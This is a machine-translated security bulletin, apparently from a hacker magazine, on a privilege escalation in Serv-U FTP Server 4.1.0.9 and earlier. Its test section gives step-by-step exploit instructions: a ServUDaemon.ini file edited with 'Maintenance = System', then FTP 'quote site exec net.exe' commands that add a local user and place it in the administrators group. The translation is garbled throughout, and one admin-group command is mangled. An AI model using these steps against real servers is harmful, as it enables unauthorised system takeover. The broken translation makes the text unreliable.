Local elevated privileges: Yes
Remote elevated privileges: Yes
Use preconditions: Serv-U profile on a modified permissions
Disclaimer: This is just a privilege escalation ideas and methods.
1, the affected software
Serv-U FTP Server 4.1.0.9 (and all previous versions)
Second, the affected system
All versions of Microsoft Windows Server 2003
All versions of Microsoft Windows XP
All versions of Microsoft Windows 2000
All versions of Microsoft Windows NT
Third, review
Serv-U FTP Server to RhinoSoft produced a Ftp Sserver software, now widely used around the world. After I found, Serv-U FTP Server configuration file stored in the Serv-U FTP Server file directory ServUDaemon.ini file. If the local limited user or a remote attacker to have general authority to access to the file and carefully file the contents of the structure ServUDaemon.ini Ftp process can use the system to execute arbitrary commands with SYSTEM privileges.
4, defect analysis:
Serv-U FTP Serve will set the user configuration information is stored and later ServUDaemon.ini file. Including the user's rights to information and to access directory information. Local limited user or a remote attacker to read and write as long as Serv-U FTP Serve the file directory, you can modify files in the directory ServUDaemon.ini Ftp process of realization of the remote, the local system administrator privileges to FTP execute arbitrary commands. System version and not subject to the impact. (User Info Select "storage and the system registry" without this defect affected)
5, test method:
1, the local test
Suppose a local limited user can browse the Serv-U FTP Serve the file directory. Find ServUDaemon.ini file. Use Notepad to open the general content of the original document as:
[GLOBAL]
Version = 4.1.0.0 / / Serv-U Ftp Server version number
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMAINS]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 file / / host IP and domain name, port conditions
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir = c: / / can browse the directory
TimeOut = 600
Access1 = C: | RWAMLCDP
If ServUDaemon.in file amended as follows:
[GLOBAL]
Version = 4.1.0.0
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMAINS]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir = c:
TimeOut = 600
Maintenance = System file / / Permissions type
Access1 = C: | RWAMELCDP
The above, more than the original content of a "Maintenance = System" save after editing. Then use the Ftp login to Serv-U FTP Server after implementation of the following command:
ftp> open ip
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready ...
User (ip: (none)): id file / / user input structure
331 User name okay, please send complete E-mail address as password.
Password: password file / / password
230 User logged in, proceed.
ftp> cd winnt file / / into win2k the winnt directory, if it is winxp or windows server 2003 should be the windows directory.
250 Directory changed to / WINNT
ftp> cd system32 file / / into the system32 directory
250 Directory changed to / WINNT/system32
ftp> quote site exec net.exe user zihuan ziHUAN / add file / / use system net.exe files plus the user.
200 EXEC command successful (TID = 33).
ftp> quote site exec net.exe localhost administrators zihuan / add file / / upgrade to super-user
This increase in the local system, a password for the zihuan: ziHUAN super user. Can also directly quote site exec net.exe localhost administrators user / add command to the current user to upgrade to the super user group to go. Of course, you can execute any command on the system.
Statement:
Books only to describe the possible security problems, the author and hackers X Files magazine this security bulletin is not to provide any guarantee or promise. As the spread of the use of the information provided in this article, a result of any direct or indirect consequences of the loss by the user himself is responsible, the author does not assume any responsibility for this. Authors have revised this security bulletin and interpretation. For this article, reproduced or transmitted, to ensure the integrity of this article, including the copyright notice and all other content. Permitted without the author may not modify or change any of the contents of this article announcement.